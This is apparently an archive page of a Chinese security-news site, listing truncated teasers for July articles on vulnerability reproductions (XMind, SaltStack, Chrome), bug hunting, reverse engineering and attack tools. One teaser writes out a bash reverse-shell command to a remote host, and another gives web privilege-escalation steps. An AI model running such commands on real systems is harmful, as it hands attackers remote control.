7月份所有文章 | CN-SEC 中文网

安全文章

漏洞复现-XMind XSS 导致RCE

免责声明：由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本文作者不为此承担任何责任。切勿用于未授权测试！本文主要来自日常学习记录！昨天新出来的Xmind x...

07月27日128 views评论

阅读全文

云安全

科普 | 自动驾驶预期功能安全（一）

轩辕实验室科普——希望更多民众关注智能网联汽车安全问题特别致谢：智能网联汽车预期功能安全工作组《智能网联汽车预期功能安全前沿技术研究报告》撰写团队！本文始发于微信公众号（轩辕实验室）：科普 | 自动...

07月27日122 views评论

阅读全文

安全漏洞

【漏洞更新】SaltStack Minion 命令注入漏洞，已复现

漏洞名称 : SaltStack Minion 命令注入漏洞(CVE-2021-31607)组件名称 : SaltStack Salt影响范围 :&n...

07月27日331 views评论

阅读全文

安全闲碎

关于漏洞挖掘的一点想法

1. 官方文档永远都是最好的一手资料，通常它包含原理，使用方法以久示例代码，对于攻击面分析非常有参考价值，而且如果自写fuzzer，甚至可能因此少写很多代码。有时候单纯把系统API过一遍都可...

07月27日64 views评论

阅读全文

安全文章

【复现】最新Chrome远程代码执行0Day

该漏洞已验证，目前Google只针对该漏洞发布了beta测试版Chrome（90.0.4430.70）修复，Chrome（ 89.0.4389.114）及以下正式版仍存在该漏洞。利用条件：此漏洞无法逃...

07月27日179 views评论

阅读全文

WEB提权方法

【1.能不能执行cmd就看这个命令：net user，net不行就用net1，再不行就上传一个net到可写可读目录，执行/c c:windowstempcookiesnet1.exe user2.当提...

07月27日安全文章61 views评论

阅读全文

linux下反弹shell的方法

Bash [不通用，跟linux发行版本有关，在ubuntu上测试成功]bash -i >& /dev/tcp/10.0.0.1/8080 0>&1PERLperl -e ...

07月27日安全文章50 views评论

阅读全文

iOS逆向方法学习和工具尝试

之前接触过iOS逆向开发，后来工作中没这方面需求，也就没再看了。最近一段时间由于各种原因又需要逆向某些App来用于学习，所以又重新拾起来。这里总结一下几种iOS逆向的方法和工具：iOS逆向-静态分析涉...

07月27日移动安全80 views评论

阅读全文

安全文章

记某交易所的漏洞挖掘

点击蓝字关注我们前言去年的这个时候有透过这个交易所，后来交易所改版过后，布了好多云防护安全产品，相关的子域名都做了限制，挖不动了，但是当时做了一个子域名监控，最近看了下多了几个...

07月27日185 views评论

阅读全文

安全闲碎

我是如何找一个影响数千职业网站的持续型XSS的

点击上方蓝字可以订阅哦我们Detectify Crowdsource平台的安全研究员ak1t4最近在他的个人博客中向我们解释了，关于他是如何发现并报告了Teamtailor上一个影响数千职业网站的持续...

07月27日80 views评论

阅读全文

安全工具

原创神器第二弹-UCenter极速爆破

前言UCenter 的中文意思就是“用户中心”，其中的 U 代表 User 也代表 You ，取其中的含义就是“用户中心”，或者说“你（最终用户）的中心”。UCenter 是 Comsenz 旗下各个...

07月27日98 views评论

阅读全文

安全工具

开源项目 | BurpCollector-利用BurpSuite收集字典

思路来源听了硬糖师傅的京东小课堂分享，感觉自己受益终身：https://mp.weixin.qq.com/s/s9K5NUE2Ou1OjJinV-bxXQ，决定将“日常收集参数”思路落地。关于插件我的...

07月27日147 views评论

阅读全文

在线咨询

微信